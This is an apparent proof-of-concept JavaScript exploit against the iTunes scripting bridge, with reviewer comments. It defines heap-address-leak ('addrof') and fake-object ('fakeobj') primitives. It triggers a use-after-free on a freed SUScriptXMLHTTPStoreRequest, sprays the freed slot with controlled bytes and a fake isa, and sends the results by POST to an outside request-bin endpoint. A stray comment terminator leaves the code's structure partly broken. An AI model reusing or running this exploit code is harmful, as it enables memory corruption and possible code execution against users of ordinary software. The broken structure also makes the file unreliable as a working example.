// var i;
// Leak the heap address of `obj` through the iTunes scripting bridge: the object
// is installed as the script-window context, and the exception raised when
// `iTunes.window` is then touched has "... instance 0x<hex>" at the end of its
// text. Returns that hex string; throws 'Unable to leak addr' if the message has
// no address; returns undefined if no exception is raised at all. The previous
// context is restored on every path, including the throw.
function addrof(obj) {
  const previous = iTunes.scriptWindowContext();
  iTunes.setScriptWindowContext_(obj);
  try {
    iTunes.window; // expected to throw with the object's description in the message
  } catch (err) {
    const leaked = /instance (0x[\da-f]+)$/i.exec(String(err));
    if (!leaked) {
      throw new Error('Unable to leak addr');
    }
    return leaked[1];
  } finally {
    iTunes.setScriptWindowContext_(previous);
  }
}
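// Try to reclaim a freed SUScriptXMLHTTPStoreRequest with controlled bytes:
// `size` bytes taken from `data`, then the 4-byte `isa`, one multipart field per
// byte. Returns the dangling wrapper `w`, which aliases the reclaimed memory if
// the spray landed.
//   size - byte length of the object body that precedes the isa field
//   data - per-byte values for offsets 0..size-1; offsets past data.length are
//          passed through as undefined (as before), so keep data.length >= size
//   isa  - 32-bit isa value, emitted as 4 bytes from its zero-padded hex form
// Fixes vs. the earlier draft: the isa was stringified in decimal and parsed with
// no radix, so the "byte" pairs were meaningless; the loop index was an implicit
// global. NOTE(review): bytes go out in hex-digit order (most significant first);
// whether the target wants little-endian is not established here — confirm.
function fakeobj(size, data, isa) {
  const totalSize = size + 4;
  // exactly 8 hex digits: the loop consumes two per byte, four times, so a short
  // value must be left-padded or the reads run off the end of the string
  const isaHex = isa.toString(16).padStart(8, '0');
  // alloc an SUScriptXMLHTTPStoreRequest
  const w = iTunes.makeXMLHTTPStoreRequest();
  const req = iTunes.createFacebookRequest('http://', 'GET');
  // malloc_size(SUScriptXMLHTTPStoreRequest) == totalSize
  const uri = str2DataUri(makeStr(totalSize));
  // avoid GC
  window.w = w;
  window.req = req;
  // get a dangling pointer
  w.dealloc();
  for (let i = 0; i < totalSize + 4; i++) {
    if (i >= size) {
      const off = i - size;
      req.addMultiPartData(uri, parseInt(isaHex.slice(off, off + 2), 16), 'B');
      i++; // two hex digits were consumed for this byte
    } else {
      req.addMultiPartData(uri, data[i], 'B');
    }
  }
  // If this doesn't work, try w();, w, xhttp.send(w), return w, and/or w().
  return w;
}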

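// Smoke test for fakeobj: a 32-byte body of 'A' plus a recognisable fake isa
// (0x41414141), handed to an XHR send — presumably to get the fake object
// dereferenced. The earlier draft filled `a` via an implicit global `i`.
const a = Array.from({ length: 32 }, () => 'A');
var xhttp = new XMLHttpRequest();
// NOTE(review): this is a third-party request-bin endpoint, not one you control;
// anything that reaches it leaves the test host. Point it at your own listener.
xhttp.open("POST", "https://5381de4c031642a344fea58b89f511ba.m.pipedream.net", true);
xhttp.send(fakeobj(192, a, 0x41414141));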
*/
// Allocate an SUScriptXMLHTTPStoreRequest and free it while this script still
// holds a reference, leaving `w` dangling.
const w = iTunes.makeXMLHTTPStoreRequest();
const req = iTunes.createFacebookRequest('http://', 'GET');
// 192 == malloc_size(SUScriptXMLHTTPStoreRequest): a body of exactly that size is
// what lets the multipart data land in the freed slot.
const uri = str2DataUri(makeStr(192));
// pin both objects so GC does not release them underneath us
window.w = w;
window.req = req;
w.dealloc(); // w now points at freed memory
// reclaim the freed allocation: 32 multipart parts, each carrying the 192-byte body
// (only the first argument matters for the spray; the other two are placeholders)
let remaining = 32;
while (remaining-- > 0) {
  req.addMultiPartData(uri, 'A', 'B');
}
// NOTE(review): this POST goes to a third-party request-bin endpoint, not one you
// control — anything that reaches it leaves the test host. Point it at your own
// listener before running.
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "https://5381de4c031642a344fea58b89f511ba.m.pipedream.net", true);
xhttp.send(0); // presumably what ends up touching the dangling w; not shown here